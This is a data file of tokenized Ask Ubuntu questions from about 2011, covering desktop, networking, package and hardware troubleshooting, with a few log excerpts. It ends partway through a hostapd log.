51078	how to test plymouth via virtual machine ?	i am trying to edit my splash screen but its really annoying to restart the computer everytime just to find out it does n't even work . i read on an article that i can do a virtual machine via ssh but i have no idea how to do that . i installed ubuntu in virtualbox yesterday now installing sudo apt-get install openssh-server openssh-client on it . now i am supposed to access the machine as root and test splash on tty1 , and i have no idea how to do that . i tried searching around but there is n't a lot of information regarding plymouth testing on the web . any help appreciated , thanks .
51083	guides for ubuntu software	as i mentioned in previous questions i am setting up a computer lab for a charity that deals with orphans in tanzania africa . one thing that would be very helpful are ebook/pdf guides for ubuntu software . keep in mind some of the kids have never used a computer , so what is basic for us is foreign for them . we will be running : libreoffice , inkscape , gimp , gnucash , audacity , scribus , vlc , blender , pidgin , clamav , virtualbox , wine , firefox , chrome , thunderbird , 7zip , openshot video editor . please let me know about any guides about using ubuntu itself or other software you feel would be helpful . brendon
51084	keeping files that are often changed in sync between desktop and laptop	i 'm looking for a way to keep a desktop and a laptop in sync . what i want to keep in sync are some folders , mainly ~/documents , that are changed often when working on them . if it matters i can connect to my desktop from anywhere via an url but my laptop is harder to access since it might be behind nat and such . i have been looking at ubuntu one but it seems to not go well with working on documents written in latex . if i work on a .tex file in the ubuntu one directory and compile it ( with pdflatex ) every now and then ( as often as every 10 sec when working ) it will create several new files including a pdf which are uploaded to ubuntu one and this seems stupid since it will create continuous upload when working on .tex files . i also usually keep .tex documents version controlled by git and then every commit ( which also can happen frequently ) will cause upload ( by changes in ./.git ) so that it happens continuously when working . another example is editing images that are saved often . what i think would be best is for sync to happen every tenth minute or at the end of every working session ( but there might be some other way to handle this ? ) .
51086	how do i enable auto-login in lightdm ?	i want user foo to auto-login using lightdm ( which has been used by ubuntu since version 11.10 ) . how would i do that ?
51088	will thunderbird 5 appear in the official 11.04 repositories ?	now that mozilla have adopted the same rapid release cycle for thunderbird as they have for firefox , will thunderbird 5 appear in the official repositories like firefox 5 did ?
51089	upnp media server ?	i am looking for a simple upnp media server software . this does not have to be a full system . all i want is for my xbox 360 to be able to play music off my laptop . i want it to pick up all media in my ~/music directory . how can i do this ?
51090	auto updates via aptitude ?	just like here : how do i set my system to auto-update without user interaction ? how can i set the auto-updates via aptitude ? are there any auto-update features in aptitude ?
51095	how can i sync gnote notes ?	i 'm looking for a way to keep a desktop and a laptop in sync . something that i want to keep in sync are gnote notes . if it matters i can connect to my desktop from anywhere via an url but my laptop is harder to access since it might be behind nat and such .
51096	sync subscribed feeds in thunderbird	i want to sync subscribed feeds , e.g . rss and atom feeds , in thunderbird between computers . here is an example case to describe what i 'm asking for . say that i have the following setup : a laptop on which i 've in thunderbird subscribed to certain feeds . a desktop on which i 've in thunderbird subscribed to certain feeds . what i want is that the subscribed feeds in thunderbird are the same on the laptop and the desktop . for example if i add a subscription on the laptop it will also be added to the desktop and if i remove a subscription from the desktop it will also be removed from the laptop . also , i want posts that are read on one computer to be marked as read on the other computer . if it matters my particular setup is such that i can connect to my desktop from anywhere via an url but my laptop is harder to access since it might be behind nat and such . also , i 'm already syncing other things with unison .
51102	how to get back the application menu for libreoffice after an update ?	i do not have the menu bar of libreoffice in the top panel of my unity desktop ( the global menu functionality ) . though i have installed lo-menubar . those are the characteristics of my system : ubuntu 11.04 . libreoffice 3.3.3 installed from the appropriate ppa . lo-menubar 0.1.1~pre1-0ubuntu2 . how do i fix it ?
51109	change unity launcher position	in ubuntu 11.04 , how can i change the position of unity launcher , which is left by default to say top , right or bottom ?
51110	issue with customizing kernel 2.6.35	i am trying to set the following values : config_standalone=n config_acpi_custom_dsdt=y config_acpi_custom_dsdt_file= '' dsdt.hex '' , i am in the middle of customizing a kernel , i have issues with the command apt-get build-dep -- no-install-recommends linux-image- $ ( uname-r ) . also , i tried apt-get build-dep linux which gives same output like the file or folder does n't exist . is there any alternate option to fix the issue ? regards , karthik .
51111	can not access compiz config	i was going through one article here and the topic was `` changing the size and appearance of the unity launcher '' which required to open up compizconfig from system settings -- > desktop . i could find system settings and could reach to control panel but can not locate either desktop or compizconfig . when i go to software center and search for compizconfig , it says that it is already installed.but when i search it from the list of installed applications , i could n't find it. ? ?
51118	why does libreoffice use openoffice.org-like icons ?	after having solved this issue by uninstalling and installing lo-menubar , i got a weird bug in libreoffice . the icons now look like the ones of the legacy openoffice.org which is not installed on my computer . can you help me solve this problem ? those are the characteristics of my system : ubuntu 11.04 , libreoffice 3.3.3 installed from the appropriate ppa .
51121	my computer stops seeing the other computers on my network	i 'm running ubuntu 11.04 . sometimes my computer stops seeing the names of the other computers on my network . so i can no longer log into another computer by typing the hosting name e.g . ssh me @ secondcomputer.local i can still log in using the local network ip address . how can i get the first way to work again without rebooting ? i know this problem is local to the computer . the other computers on my network can still see one another . but they can no longer see the computer i 'm working on , not even by local ip address .
51122	setting gnome-terminal window size from within ~/.bashrc	it know that it is possible to pass the -- geometry=wxh arguments when using launcher , but how to set this option with the ~/.bashrc file .
51124	hold packages back from updates without apt pin ?	i know about pinning packages with apt . that 's not what i want to do . other questions have been answered with either using pinning or by using pins temporarily . i do n't want to do this . what i want to do is keep packages back the same way the kernel has been : # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : i want to add tomcat-* and mysql-* and sun-* to this list . in the past , there was a configuration parameter to do this . i 've always thought it was something like apt : :get : :holdpkgs or apt : :holdpkgs but i ca n't find it . i want to have these packages held from updates until i specifically request them with an apt-get install . i found the apt-get configuration apt : :neverautoremove . will this do what i want ? added question : i notice that apt : :neverautoremove and apt : :never-markauto-sections ( among others ) are not documented so far as i can see . they 're not in the manpages . neither is aptitude : :keep-unused-pattern and aptitude : :get-root-command . is there any comprehensive and complete documentation for apt.conf ?
51132	gnome-open raises this error when run from inside tmux	the error i get is this : gconf error : failed to contact configuration server ; the most common cause is a missing or misconfigured d-bus session bus daemon . see http : //projects.gnome.org/gconf/ for information . ( details - 1 : failed to get connection to session : error connecting : connection refused ) failed to open bus : failed to connect to socket /tmp/dbus-byc0lhrehk : connection refused any suggestions ?
51133	trouble installing from disk	i 'm writing this in desperation , windows is slowly killing me and i need to change my home pc os to ubuntu 11.04 as soon as possible . i created a usb flash drive to install ubuntu , twice , and both times they failed to begin install on restart of my pc . i read on another forum that you might have to change some boot sequence in bios but when pressing f2 to enter it didnt work . after a lot of cursing , i made myself an ubuntu install cd and booted . to my excitement , it now displayed ... try ubuntu and install ubuntu . i clicked install ubuntu which lead me to the preparing to install ubuntu display , i checked download updates while installing and clicked forward . the very next display is ' allocate drive space ' i assume there are meant to be options of drives provided but mine is just a blank box and underneath all the options to create a new partition table , add , change , delete and revert are all greyed out . there is a drop down menu labelled 'device for boot loader installlation ' but the only option is /dev/sda . when i click install , a no root file system error comes up telling me to please correct from the partitioning menu . i am extremely frustrated . please ! ! can anyone help me ...
51136	can i uninstall & replace firefox with another browser of my choice ?	i do n't like the firefox web browser , and i prefer to use something else . how can i remove it and use a browser of my choice ?
51137	what does ubuntu do when i signal undocking to a laptop ?	it seems that ubuntu runs some script or command when i signal that i want to undock my laptop by pressing the undock button on the dock . most visible thing that happens is that resolution on external display is changed . after prepearing for undock my laptop is still connected to power , vga-output and audio jacks through dock but not to any usb devices or optical drive . i 'm running 11.04 on a thinkpad x61s with x6 ultrabase . what happens when i signal undocking ? this is what dmesg says after pressing undock button : [ 81459.990682 ] ata1.00 : disabled [ 81459.990727 ] ata1.00 : detaching ( scsi 0:0:0:0 ) [ 81459.991722 ] acpi : \_sb_.gdck - undocking [ 81460.009462 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 [ 81460.020252 ] ehci_hcd 0000:00:1a.7 : bar 0 : set to [ mem 0xfe226c00-0xfe226fff ] ( pci address [ 0xfe226c00-0xfe226fff ] ) [ 81460.020265 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 [ 81460.020281 ] ehci_hcd 0000:00:1a.7 : restoring config space at offset 0xf ( was 0x300 , writing 0x30b ) [ 81460.020309 ] ehci_hcd 0000:00:1a.7 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900102 ) [ 81460.020338 ] ehci_hcd 0000:00:1a.7 : pme # disabled [ 81460.020346 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 [ 81460.020352 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 [ 81460.020363 ] ehci_hcd 0000:00:1a.7 : pci int c - > gsi 22 ( level , low ) - > irq 22 [ 81460.020372 ] ehci_hcd 0000:00:1a.7 : setting latency timer to 64 [ 81460.020432 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 [ 81460.040071 ] ehci_hcd 0000:00:1d.7 : bar 0 : set to [ mem 0xfe227000-0xfe2273ff ] ( pci address [ 0xfe227000-0xfe2273ff ] ) [ 81460.040085 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 [ 81460.040104 ] ehci_hcd 0000:00:1d.7 : restoring config space at offset 0xf ( was 0x400 , writing 0x40b ) [ 81460.040133 ] ehci_hcd 0000:00:1d.7 : restoring config space at offset 0x1 ( was 0x2900000 , writing 0x2900102 ) [ 81460.040170 ] ehci_hcd 0000:00:1d.7 : pme # disabled [ 81460.040178 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 [ 81460.040184 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 [ 81460.040195 ] ehci_hcd 0000:00:1d.7 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 81460.040204 ] ehci_hcd 0000:00:1d.7 : setting latency timer to 64 [ 81460.040503 ] ehci_hcd 0000:00:1d.7 : pci int d disabled [ 81460.040552 ] ehci_hcd 0000:00:1d.7 : pme # enabled [ 81460.061657 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d3 [ 81460.200414 ] usb 1-4 : usb disconnect , address 14 [ 81462.220088 ] ehci_hcd 0000:00:1a.7 : pci int c disabled [ 81462.220169 ] ehci_hcd 0000:00:1a.7 : pme # enabled [ 81462.240115 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d3
51138	how do i add a new contact to empathy ?	so far i 've discovered that i can open my chat list by clicking the mail icon and not the chat icon . however , wherever i click , i ca n't find a way to add a new buddy . does anyone know how to do this ?
51141	composite-video-to-usb adaptor	i bought a composite-video-to-usb adaptor . i want to stream video game in ubuntu . how can i do that ? my environment : monoprice usb video and audio grabber ubuntu 11.04 the relevant output of lsusb : bus 001 device 011 : id 0572:262a conexant systems ( rockwell ) , inc . the relevant output of sudo lshw : *-usb:0 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport : f0e0 ( size=32 ) *-usb:1 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport : f0c0 ( size=32 ) *-usb:2 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 6 vendor : intel corporation physical id : 1a.2 bus info : pci @ 0000:00:1a.2 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : f0a0 ( size=32 ) *-usb:3 description : usb controller product : 82801ji ( ich10 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 00 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:18 memory : e0525c00-e0525fff *-multimedia description : audio device product : 82801ji ( ich10 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:43 memory : e0520000-e0523fff *-usb:4 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport : f080 ( size=32 ) *-usb:5 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport : f060 ( size=32 ) *-usb:6 description : usb controller product : 82801ji ( ich10 family ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 00 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : f040 ( size=32 ) *-usb:7 description : usb controller product : 82801ji ( ich10 family ) usb2 ehci controller # 1 vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 00 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : e0525800-e0525bff the relevant output of dmesg : [ 18953.220035 ] usb 1-1 : new high speed usb device using ehci_hcd and address 6 [ 19964.761076 ] linux video capture interface : v2.00 [ 19964.767112 ] usbcore : registered new interface driver uvcvideo [ 19964.767115 ] usb video class driver ( v1.0.0 )
51143	how to boot from iram solid state drive on ubuntu	i 've got an iram solid state drive . i 'd like to use this to store a root filesystem ; the trouble is the device is not recognized as a hard drive to the bios . it only shows up if a live cd environment is loaded and the scsi drivers are available ( may be other drivers needed as well ) . i 've heard of boot to ram and wonder if some variation of that could work here so i can start ubuntu from the iram ?
51145	how to run a command before the machine automatically shutdowns ?	how to run a command before the machine automatically shutdowns ?
51154	once mounted using truecrypt , can not unmount	i have an external hdd and use truecrypt for keeping encrypted file containers . after mounting , whenever i try to dismount a file container ( using truecrypt 7.0a on ubuntu 11.04 ) , it just does not happen and i get the following message : device-mapper : remove ioctl failed : device or resource busy command failed further , if i close truecrypt and then try to start it again , it says that truecrypt is already running , but i can not access it from the unity sidebar ( because it is not there ) . also , if i power down my external hdd , the truecrypt volume still shows as one of the mounted volumes , but i can not do anything with it . any possible work around ? i remember this not happening in earlier versions of ubuntu so i am guessing there is something to do with 11.04 . thanks
51156	how can i reach over 100 % volume with a keyboard shortcut ?	sometimes the sound of videos is n't enough for me . so i reach the sound indicator , over sound preferences and change it to a level higher than 100 % . the question is how can i do it from the keyboard ? now i can control the volume from the keyboard but it 's maximum is 100 % . is there a way to do that ? edit 1 : how to use amixer and scripts to do it ? ( as lyrositor suggested ) edit2 : the closest answer , as jo-erland , suggested is to set a hotkey to bring up the gnome-volume-control , and then to use left and right arrows to change volume also beyond the 100 % mark . any other suggestions , to make this 1 step only ? is it possible to set a hotkey to do a sequence of commands ?
51157	what is the difference between a gtk theme , metacity theme , and emerald theme ?	i keep seeing themes as being labelled as metacity or gtk or emerald . from reading in other places , i gather that metacity is a window manager and changes the window borders , so what is a gtk theme ? is n't gtk a widget toolkit , used for drawing controls and other interface elements inside the window ? and what is emerald ? can somebody please explain in simple noob-to-linux terms ?
51163	ubuntu software center crashes after fail install	i tried to install libboost-system1.42-dev package but for some reason it crashed for the first time . now for any package i try to install i get : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 961 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1085 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 226 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate file for the libboost-system1.42-dev package . this might mean you need to manually fix this package . any ideas on how to deal with the problem ? thanks in advance
51166	make qt programs look good under xfce ?	i use xfce . my problem is - some programs look nice and some sort of ugly . afaik this is because xfce is gtk and most programs use gtk theme , but some programs use qt and thus do n't use gtk themes ( rocket science right there ) . so - my question is - how can i apply some theme to these qt programs ? can i download some qt theme and drop into ~/.themes ? would that work ? qt programs do n't have to look absolutely the same as gtk ones - i do n't care about that . but i want them at least not to look so dam ugly . : ) thanks !
51167	ubuntu crashes using firefox	ubuntu 11.04 keeps crashing when i use firefox , browsing through large pictures with google . how come ? while using firefox ubuntu simply stops , black screen , restarts and prompts me to log in again . this problem did not occur in the past versions of ubuntu ( i.e . 10 , 9 ... ) on the same machine . specs : i am using a dell vostro 1510 with integrated intel graphic controllers . lspci reads : vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c )
51170	how can i get my bluetooth headset 's microphone working ?	i have a neurosky mindset that doubles as a bluetooth headset . bluetooth picks up the device fine and i have audio working . in sound preferences for input devices the headset is n't listed so i 'm unable to get my mic working . i 'm running ubuntu 11.04 .
51171	pdf thumbnails do n't work	for a reason i do n't know my ubuntu does n't show thumbnails for pdf . in gconf-editor - > - > /desktop/gnome/thumbnailers : application @ pdf/command = `` evince-thumbnailer -s % s % u % o '' application @ pdf/enable = `` true '' from console evince-thumbnailer file.pdf out.png works perfectly what can be wrong ? ? when i installed gnome3 thumbnails worked but everything else didnt . when returned to gnome2.3 - no thumbnails .
51172	set oom killer adjustment for process on startup ?	is there a way to set the oom killer adjustment value right when a daemon process ( apache in my case ) starts ? i would like to give the apache processes a higher likelihood of being killed and make it virtually impossible for some more vital services to bet killed by the oom killer . btw : if anyone could create a tag for oom or oom-killer that would be nice .
51176	lenovo y460 intel driver secondary display flickering	this is a part of the massive dump of problems i 'm encountering with my lenovo y460 and ubuntu . problem : ati powerxpress does n't really work . does n't work as i have to use the open source driver with hacks . turned off ati card at boot details on how i accomplished that : http : //ubuntuforums.org/showthread.php ? p=10955831 # post10955831 installing the ati drivers results in a failure of the intel drivers to work with ubuntu class ( all animations have to turned off ) . anyway to fix this problem to allow switchable graphics to work ? the problem above has been fixed by fglrx ( catalyst 11.6 ) is it compatible with kernel 2.6.39 ? however , there 's another issue . if i connect my secondary monitor ( vga 17 '' ) while using the intel driver , i would not be able to use that screen as there 's flickering and tearing , making the screen blurry and usable . here 's the fglrxinfo : $ fglrxinfo display : :0.0 screen : 0 opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile gem 20100330 development opengl version string : 1.4 ( 2.1 mesa 7.10.2 ) any fixes for that ? potential related bug report on launchpad : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/750259 however i ca n't confirm because the video showing that is much more dramatic than what i have , mine are tiny flickering that wo n't be captured by video cameras as i 've tried , but enough to make it blurry for humans .
51177	lenovo y460 shutdown/reboot/logoff does n't work	this is a part of the massive dump of problems i 'm encountering with my lenovo y460 and ubuntu . problem : can not shutdown/reboot/logoff . logoff issue : http : //ubuntuforums.org/showthread.php ? t=1791439 shutdown and reboot often freezes without doing anything . currently can only use hard reset . maybe related to the tricks i did to work around the ati/intel issue . see : lenovo y460 ati powerxpress issue i 'm not sure where i can find the shutdown/reboot logs . if you tell me i 'll be happy to provide them . not sure what to do as of right now other than never shutdown/reboot or logoff
51178	can not login in account with encrypted home after update from 11.04 to 11.10	after upgrading from ubuntu 11.04 to 10.10 i can not access my encrypted home partition anymore . i can login , however all data stays encrypted . ecryptfs-mount-private gives : error : encrypted private directory is not setup properly any idea how to fix this ? update i have several kernels installed ( after the upgrade my menu.lst looks like this : http : //paste.org/pastebin/view/35591 ) the problem is the same for all kernels . booting from 2.6.32-27-generic and adduser -- encrypt-home tes gives : adding user `tes ' ... adding new group `tes ' ( 1008 ) ... adding new user `tes ' ( 1007 ) with group `tes ' ... creating home directory `/home/tes ' ... setting up encryption ... ************************************************************************ you should record your mount passphrase and store it in a safe location . ecryptfs-unwrap-passphrase ~/.ecryptfs/wrapped-passphrase this will be required if you need to recover your data at a later time . ************************************************************************ error : your kernel does not support filename encryption error : could not add passphrase to the current keyring adduser : `/usr/bin/ecryptfs-setup-private -b -u tes ' returned error code 1 . exiting .
51179	disable shutdown/suspend if there is other user logged in via ssh	i remember that in versions of ubuntu around 9.04 was possible to disable user to shutdown ( and maybe suspend too ) system if there was other user logged in.something like policykit or similar . is it possible to do in 11.04 ? thanks edit : if someone needs ( for own risk ) , little change in /usr/lib/pm-utils/bin/pm-action will allow user to suspend machine if he is only user logged in or when user will run sudo pm-suspend . probably not best piece of code , but for now works . diff -r 805887c5c0f6 pm-action -- - a/pm-action wed jun 29 23:32:01 2011 +0200 +++ b/pm-action wed jun 29 23:37:23 2011 +0200 @ @ -47,6 +47,14 @ @ exit 1 fi +if [ `` $ ( id -u ) '' == 0 -o `w -h | cut -f 1 -d `` `` | sort | uniq | wc -l` -eq 1 ] ; then + echo `` either youre root or root isnt here and youre only user , continuing '' 1 > & 2 + else + echo `` not suspending , root is here or there is more users '' 1 > & 2 + exit 2 + fi + + remove_suspend_lock ( ) { release_lock `` $ { stashname } .lock '' question still stands , is it possible to forbid shutdown or suspend when there is more than one user logged in ( without rewriting pm-suspend or halt ( or other hack ) ) ?
51187	is it possible to hide folders ?	i want to hide some folders that i do n't really want to hide all those folders that i do n't use . since system is using them i ca n't really rename them to add . in front of them . is there any other way ?
51191	how can i move files from one place to other with validation/md5 done to origin and destination ?	how can i move files from one place to other with validation/md5 done to origin and destination ? is there some tool or sequence of commands you can script to do this ?
51193	ubuntu one files for android will not let me log in	i installed ubuntu one files on my nexus one phone . when i tap log in on the main screen , the app tries to log in then after a few seconds returns the following message : log-in failed , please try again later . i have an ubuntu one account , and when i tap register on the main screen for ubuntu one files , i can log in using my phone 's web browser . but if i go back to the app and try to log in , i get the same error . again , my phone is a nexus one running android 2.3.4 . the phone is not rooted or modded in any way .
51194	how to make the unity app search find a manually installed app	i installed the scriptwriting celtx software following the instructions on their site which had me place it inside of ~/bin/celtx i can execute it with no problems by running bin/celtx/celtx & from the terminal . i prefer to launch my apps via the unity search/finder thing that i get by hitting what i guess is called the super button . how do i go about placing a link to celtx in there ?
51196	import emails from hard disk image ?	my old pentium 3 email server just died on me . is it possible import all my emails that i had ? i was running postfix and the cyrus imap server . i can chroot to the hard drive to run any commands if needed . after grep'ing the hard drive , i found that all of my emails are in /var/spool/imap . i assume that i ca n't just copy all the emails to my new server , so what do i need to do to get them onto my new server ?
51197	how do i setup my ubuntu on a wifi network ?	i need to set up ubuntu for wifi network . how do i do that ? i can not see the name of my network listed .
51202	how to disable viewing window 's hidden files in ubuntu ?	i used ubuntu 10.10 with wubi . it has been such a confusing matter that my hidden files on window now can easily be seen on ubuntu . it 's not good at all . how can i disable this function of ubuntu ?
51204	how can i install a driver ?	although my ethernet card worked , i had very bad latency and speed . i looked up the hardware and i found a driver . having run its autorun.sh script makes the hardware work correctly . it loads the module by calling modprobe . however , i have to do this after every boot . how can i permanently install this module ?
51205	eth0 missing after upgrading from hoary to dapper	i 'm trying to upgrade a fairly old server that 's been running hoary for the last five years . i followed the directions on the wiki , but when i restarted after upgrading to dapper , eth0 disappeared from ifconfig -a. i can see two ethernet adapters in lspci and lshw , and if i put in an ubuntu 10.10 livecd it registers eth0 and eth1 perfectly well . their mac addresses also match what 's in /etc/iftab . it was working fine before the upgrade , and i have no idea what else i should be trying at this point . the server is entirely cut off from the network right now . edit : /etc/udev/rules.d/70-persistent-net.rules does n't exist , either .
51212	how to fix a key that sends a modifier+key	my laptop has a dedicated lock key , which sends a super_l+l messing with unity and making it rather useless . i have no idea how to fix this as i get 2 keycodes with showkeys and acpi_listen gives no output . any ideas ?
51213	dlink dwa-556 access point fails to start on 2.6.35-25 while 2.6.35-24 works . how can i do this with > 2.6.35-24 ?	i 'm using hostapd to run an access point with a dlink dwa-556 wireless n card . however , i can no longer get it to start when i use kernels greater than 2.6.35-24 . here 's a log where i ran the uname -a & & hostapd -c < configfile > on the different kernel versions . linux erikbandersen 2.6.35-24-generic # 42-ubuntu smp thu dec 2 02:41:37 utc 2010 x86_64 gnu/linux configuration file : hostapd.conf ctrl_interface_group=0 opening raw packet socket for ifindex 248 bss count 1 , bssid mask ff : ff : ff : ff : ff : ff ( 0 bits ) siocgiwrange : we ( compiled ) =22 we ( source ) =21 enc_capa=0xf nl80211 : added 802.11b mode based on 802.11g information ht40 : control channel : 2 secondary channel : 6 rate [ 0 ] rate=10 flags=0x2 rate [ 1 ] rate=20 flags=0x6 rate [ 2 ] rate=55 flags=0x6 rate [ 3 ] rate=110 flags=0x6 rate [ 4 ] rate=60 flags=0x0 rate [ 5 ] rate=90 flags=0x0 rate [ 6 ] rate=120 flags=0x0 rate [ 7 ] rate=180 flags=0x0 rate [ 8 ] rate=240 flags=0x0 rate [ 9 ] rate=360 flags=0x0 rate [ 10 ] rate=480 flags=0x0 rate [ 11 ] rate=540 flags=0x0 passive scanning not supported mode : ieee 802.11g channel : 2 frequency : 2417 mhz flushing old station entries deauthenticate all stations using interface wlan1 with hwaddr 1c : bd : b9 : d5 : e8:3c and ssid 'erikbandersen.com/freewifi' wlan1 : setup of interface done . mgmt ( tx callback ) ack malformed netlink message : len=436 left=256 plen=420 256 extra bytes in the end of netlink message mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt : :auth authentication : sta=3c:4a:92:0e:41:2f auth_alg=0 auth_transaction=1 status_code=0 wep=0 new sta wlan1 : sta 3c:4a:92:0e:41:2f ieee 802.11 : authentication ok ( open system ) wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-authenticate.indication ( 3c:4a:92:0e:41:2f , open_system ) wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-deletekeys.request ( 3c:4a:92:0e:41:2f ) authentication reply : sta=3c:4a:92:0e:41:2f auth_alg=0 auth_transaction=2 resp=0 ( ie len=0 ) mgmt ( tx callback ) ack mgmt : :auth cb wlan1 : sta 3c:4a:92:0e:41:2f ieee 802.11 : authenticated mgmt : :assoc_req association request : sta=3c:4a:92:0e:41:2f capab_info=0x421 listen_interval=10 validating wmm ie : oui 00:50 : f2 oui type 2 oui sub-type 0 version 1 qos info 0x0 ht : sta 3c:4a:92:0e:41:2f ht capabilities info : 0x102c handle_assoc sta 3c:4a:92:0e:41:2f - no greenfield , num of non-gf stations 1 handle_assoc sta 3c:4a:92:0e:41:2f - 20 mhz ht , num of 20mhz ht stas 1 hostapd_ht_operation_update current operation mode=0x0 hostapd_ht_operation_update new operation mode=0x7 changes=2 new aid 1 wlan1 : sta 3c:4a:92:0e:41:2f ieee 802.11 : association ok ( aid 1 ) mgmt ( tx callback ) ack mgmt : :assoc_resp cb wlan1 : sta 3c:4a:92:0e:41:2f ieee 802.11 : associated ( aid 1 ) wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-associate.indication ( 3c:4a:92:0e:41:2f ) wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-deletekeys.request ( 3c:4a:92:0e:41:2f ) wlan1 : sta 3c:4a:92:0e:41:2f radius : starting accounting session 4dac8224-00000000 mgmt ( tx callback ) ack mgmt : :action cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb mgmt ( tx callback ) ack mgmt : :proberesp cb signal 2 received - terminating wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-deauthenticate.indication ( 3c:4a:92:0e:41:2f , 1 ) wlan1 : sta 3c:4a:92:0e:41:2f mlme : mlme-deletekeys.request ( 3c:4a:92:0e:41:2f ) removing station 3c:4a:92:0e:41:2f hostapd_ht_operation_update current operation mode=0x7 hostapd_ht_operation_update new operation mode=0x0 changes=2 flushing old station entries deauthenticate all stations . linux erikbandersen 2.6.35-25-generic # 44-ubuntu smp fri jan 21 17:40:44 utc 2011 x86_64 gnu/linux configuration file : hostapd.conf ctrl_interface_group=0 opening raw packet socket for ifindex 248 bss count 1 , bssid mask ff : ff : ff : ff : ff : ff ( 0 bits ) siocgiwrange : we ( compiled ) =22 we ( source ) =21 enc_capa=0xf nl80211 : added 802.11b mode based on 802.11g information allowed channel : mode=1 chan=1 freq=2412 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=2 freq=2417 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=3 freq=2422 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=4 freq=2427 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=5 freq=2432 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=6 freq=2437 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=7 freq=2442 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=8 freq=2447 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=9 freq=2452 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=10 freq=2457 mhz max_tx_power=27 dbm allowed channel : mode=1 chan=11 freq=2462 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=1 freq=2412 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=2 freq=2417 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=3 freq=2422 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=4 freq=2427 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=5 freq=2432 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=6 freq=2437 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=7 freq=2442 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=8 freq=2447 mhz 